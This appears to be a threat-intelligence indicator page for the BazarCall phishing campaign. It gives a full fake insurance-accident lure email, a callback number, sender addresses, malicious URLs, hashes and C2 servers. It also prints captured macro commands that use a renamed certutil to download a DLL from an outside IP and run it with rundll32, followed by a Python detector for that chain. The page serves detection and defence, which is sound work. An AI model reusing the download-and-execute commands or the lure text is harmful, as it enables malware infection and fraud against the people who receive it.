- THREAT IDENTIFICATION: BAZARCALL
- SUBJECTS OBSERVED
- Notification email of an abandoned road accident site! Need to to get in touch with a manager!
- Notification letter of an abandoned highway accident site! Should to get hold of a supervisor!
- Notification letter of an abandoned highway accident site! Must to get hold of a supervisor!
- SENDERS OBSERVED
- administrator@lupolshop.xyz
- astong1t@gmx.com
- bill@milbank.com
- bill@vm476413.eurodir.ru
- support@powerpresspushup.club
- LURE PHONE NUMBER
- 1 313 217 5223
- EMAIL BODY
- Milbank LLP Insurance company
- Re: Accident on 07/12/2021
- Case Number: L0XXXXXXXXX
- Dear <First> <Last>,
- This mail is to notify you that the vehicle that is documented on your name has left the location of the accident on 07/12/2021.
- In case you would like to see the complete information about the car that has been related to the car accident and images and video material confirming the incident, please remember to get in touch with us from 9 am thru 6 pm ET at:1 313 217 5223. Our agents will give you all the details you may need.
- You must get in touch with us immediately or we will have to submit a report regarding an incident to authorities.
- Regards,
- Milbank LLP Insurance company
- MALDOC LANDING PAGES
- https://milbankllp.net/
- https://milbankllp.net/order
- https://milbankllp.net/case
- MALDOC DOWNLOAD URL
- https://milbankllp.net/download.php
- BAZARCALL MALDOC FILE HASHES
- case_L0XXXXXXXXX.xlsb
- 535f0ae54da4ce0b5b9aedae9a3efa85
- case_L0XXXXXXXXX.xlsb
- 39757aa22acd02291e185ce4c087dad0
- CAPTURED COMMANDS FROM MACROS
- cmd.exe [580]
- "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\DYdPAHU && copy /b %SystemRoot%\System32\c*tutil.exe c:\programdata\DYdPAHU\DYdPAHU.exe
- cmd.exe [1852]
- "C:\Windows\System32\cmd.exe" /c c:\programdata\DYdPAHU\DYdPAHU.exe -urlcache -f -split http://37.10.71.16 c:\programdata\DYdPAHU\DYdPAHU.dll
- cmd.exe [1540]
- "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\DYdPAHU\DYdPAHU.dll,GlobalOut
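The three captured commands form a chain: a wildcard copy (`c*tutil.exe`) puts a renamed certutil.exe under ProgramData, that copy fetches the DLL with `-urlcache -f -split`, and rundll32 calls the `GlobalOut` export. As an added, defender-side example that is not part of the original paste, the Python below scores command lines against each stage and correlates the rename with the later execution of the renamed binary, so a rule keyed only on the image name "certutil" would not be fooled. The three malicious lines are the ones listed above; the benign lines and the rule names are constructed for illustration.

```python
import re

# Command lines captured on the page, as (process, command line).
CAPTURED_COMMANDS = [
    ("cmd.exe [580]",
     r'"C:\Windows\System32\cmd.exe" /c mkdir %programdata%\DYdPAHU && copy /b %SystemRoot%\System32\c*tutil.exe c:\programdata\DYdPAHU\DYdPAHU.exe'),
    ("cmd.exe [1852]",
     r'"C:\Windows\System32\cmd.exe" /c c:\programdata\DYdPAHU\DYdPAHU.exe -urlcache -f -split http://37.10.71.16 c:\programdata\DYdPAHU\DYdPAHU.dll'),
    ("cmd.exe [1540]",
     r'"C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\DYdPAHU\DYdPAHU.dll,GlobalOut'),
]

# Constructed benign command lines for contrast; these are NOT from the page.
BENIGN_COMMANDS = [
    ("cmd.exe [9001]", r'"C:\Windows\System32\cmd.exe" /c copy /b C:\build\part1.bin C:\build\out.bin'),
    ("certutil.exe [9002]", r'certutil.exe -hashfile C:\Windows\notepad.exe SHA256'),
    ("rundll32.exe [9003]", r'rundll32.exe shell32.dll,Control_RunDLL'),
]

# Stage 1: a wildcard copy of a System32 binary to some other path.
# The wildcard (c*tutil.exe) defeats naive substring matching on "certutil",
# so match the shape of the copy instead and capture the destination.
COPY_FROM_SYSTEM32 = re.compile(
    r"copy\s+(?:/b\s+)?(?P<src>\S*system32\\[^\s]*\*[^\s]*\.exe)\s+(?P<dst>\S+)", re.I)

# Stage 2: certutil's URL-fetch arguments, whatever the image is called.
URLCACHE_DOWNLOAD = re.compile(r"-urlcache\b.*\s-f\b.*https?://", re.I)

# Stage 3: rundll32 loading a DLL from ProgramData and calling a named export.
RUNDLL32_PROGRAMDATA = re.compile(
    r"rundll32(?:\.exe)?\s+\S*programdata\S*\.dll,\w+", re.I)


def detect(commands):
    """Return a list of (process, rule_name) findings for a sequence of
    command lines. Stage 1 records the destination of the copied binary so
    that its later execution (stage 2 here) is flagged even though the
    command line never mentions certutil by name."""
    findings = []
    renamed_binaries = set()
    for proc, cmd in commands:
        low = cmd.lower()
        m = COPY_FROM_SYSTEM32.search(cmd)
        if m:
            findings.append((proc, "system32_binary_copied_with_wildcard"))
            renamed_binaries.add(m.group("dst").lower())
        if URLCACHE_DOWNLOAD.search(cmd):
            findings.append((proc, "certutil_urlcache_download"))
        if RUNDLL32_PROGRAMDATA.search(cmd):
            findings.append((proc, "rundll32_dll_from_programdata"))
        # Any later command line that references a binary created by an
        # earlier wildcard copy is the renamed LOLBin being run.
        if not m and any(dst in low for dst in renamed_binaries):
            findings.append((proc, "renamed_lolbin_executed"))
    return findings


if __name__ == "__main__":
    for proc, rule in detect(CAPTURED_COMMANDS):
        print(f"{proc}: {rule}")
    print("benign findings:", detect(BENIGN_COMMANDS))
```

The correlation is order-dependent by design: process-creation telemetry (for example Sysmon event 1) is emitted in execution order, so feeding it in that order lets the stage-1 destination path seed the check for stage 2.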
- BAZAR PAYLOAD DOWNLOAD URL
- http://37.10.71.16
- BAZAR PAYLOAD FILE HASHES
- DYdPAHU.exe (a renamed copy of certutil.exe, not a malicious binary)
- 0d52559aef4aa5eac82f530617032283
- DYdPAHU.dll
- 1b5565aabbcc5a2218d05c816009c7a4
- BAZAR C2
- https://13.52.241.196/req/proc
- https://195.123.233.106/req/proc